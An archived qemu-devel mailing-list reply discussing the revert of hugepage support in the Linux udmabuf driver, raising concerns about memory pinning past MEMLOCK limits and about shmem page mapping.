qemu-devel
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [PATCH] udmabuf: revert 'Add support for mapping hugepages (v4)'


From: David Hildenbrand
Subject: Re: [PATCH] udmabuf: revert 'Add support for mapping hugepages (v4)'
Date: Mon, 12 Jun 2023 09:46:22 +0200
User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Thunderbird/102.12.0

On 12.06.23 09:10, Kasireddy, Vivek wrote:
Hi Mike,

Hi Vivek,


Sorry for the late reply; I just got back from vacation.
If it is unsafe to directly use the subpages of a hugetlb page, then reverting
this patch seems like the only option for addressing this issue immediately.
So, this patch is
Acked-by: Vivek Kasireddy <vivek.kasireddy@intel.com>

As far as the use-case is concerned, there are two main users of the udmabuf
driver: Qemu and CrosVM VMMs. However, it appears Qemu is the only one
that uses hugetlb pages (when hugetlb=on is set) as the backing store for
Guest (Linux, Android and Windows) system memory. The main goal is to
share the pages associated with the Guest allocated framebuffer (FB) with
the Host GPU driver and other components in a zero-copy way. To that end,
the guest GPU driver (virtio-gpu) allocates 4k size pages (associated with
the FB) and pins them before sharing the (guest) physical (or dma) addresses
(and lengths) with Qemu. Qemu then translates the addresses into file
offsets and shares these offsets with udmabuf.

Is my understanding correct, that we can effectively long-term pin (worse than mlock) 64 MiB per UDMABUF_CREATE, allowing eventually !root users

ll /dev/udmabuf
crw-rw---- 1 root kvm 10, 125 12. Jun 08:12 /dev/udmabuf

to bypass there effective MEMLOCK limit, fragmenting physical memory and breaking swap?


Regarding the udmabuf_vm_fault(), I assume we're mapping pages we obtained from the memfd ourselves into a special VMA (mmap() of the udmabuf). I'm not sure how well shmem pages are prepared for getting mapped by someone else into an arbitrary VMA (page->index?).

... also, just imagine someone doing FALLOC_FL_PUNCH_HOLE / ftruncate() on the memfd. What's mapped into the memfd no longer corresponds to what's pinned / mapped into the VMA.


Was linux-mm (and especially shmem maintainers, ccing Hugh) involved in the upstreaming of udmabuf?

--
Cheers,

David / dhildenb




reply via email to

[Prev in Thread] Current Thread [Next in Thread]